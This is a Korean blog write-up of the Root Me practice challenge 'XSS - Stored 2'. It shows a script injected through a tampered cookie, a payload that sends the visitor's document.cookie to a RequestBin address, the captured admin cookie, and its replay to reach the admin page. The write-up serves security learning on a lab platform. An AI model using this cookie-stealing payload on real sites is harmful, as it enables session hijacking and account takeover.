SWLUG/web hacking

[RootMe] XSS - Stored 2

keemnh 2024. 11. 13. 17:26

https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2

 

Challenges/Web - Client : XSS - Stored 2 [Root Me : Hacking and Information Security learning platform]

 

www.root-me.org

 

 

문제 확인

 

관리자 세션의 쿠키를 탈취해 관리자 페이지에 접속하라는 미션

 

XSS는 Cross Site Scripting의 약자로, 웹 서버에 관리자가 아닌 사용자가 악성 스크립트를 삽입할 수 있는 취약점을 뜻함
일반적으로 공격자는 자신의 서버를 준비해두고, XSS 취약점을 이용해 타겟 웹 서버에 악성 스크립트를 삽입한 후, 사용자들의 인증 정보(쿠키, 세션 값 등)를 탈취하는 데 활용

 

 

 

 

 

 

 

 

 

 

문제 풀이

 

 

 

아무거나 입력해봄

글을 쓰면 저렇게 옆에 status 가 같이 찍혀서 나옴

 

 

해당 페이지에서 관리자 도구로 쿠키값 확인
status 라는 이름의 쿠키에 invite 라는 값이 저장되어 있는데 이걸 변조하여 XSS 공격 시도

 

 

 

 

status 쿠키의 값을 abcd"><script>alert(1)</script> 로 변경

결과적으로  <i class="abcd"><script>alert(1)</script>">status : invite</i> 가 입력되어 alert(1) 실행

 

 

 

 

입력 후 새로고침

 alert(1) 이 실행되어서 알림창이 뜨는 걸 확인

 

 

 

RequestBin에 가서 요청을 받아줄 주소를 하나 생성

 

RequestBin.com — A modern request bin to collect, inspect and debug HTTP requests and webhooks

 

public.requestbin.com

 

 

 

abcd"><script>document.location.href="https://eno89qi8uyyqq.x.pipedream.net?cookie="+document.cookie</script>

생성한 주소를 활용해 위와 같이 쿠키값을 설정

 

 

 



아무글이나 하나 작성하고 대기

 

작성하고 엔터치면 아래와 같이 창이 출력되는 걸 확인

 

 

 

RequestBin에 찍혀있는 ADMIN_COOKIE 를 확인

 

ADMIN_COOKIE=SY2USDIH78TF3DFU78546TE7

 

 

 

ModHeader 설치

 

ModHeader - Modify HTTP headers - Chrome 웹 스토어

Modify HTTP request headers, response headers, and redirect URLs

chromewebstore.google.com

 

 

 

알아낸 쿠키값을 ModHeader를 이용해 변경

 

 


 admin 버튼을 클릭하면 성공!!

 

 

 

'SWLUG > web hacking' 카테고리의 다른 글

[DreamHack] Mango  (0) 2024.11.17
[CTF/ Dreamhack] login-1  (0) 2024.11.17
[WebGoat] Cross Site Scripting  (0) 2024.11.13
[Dreamhack] DOM XSS  (0) 2024.11.13
[RootMe] Directory traversal  (1) 2024.11.04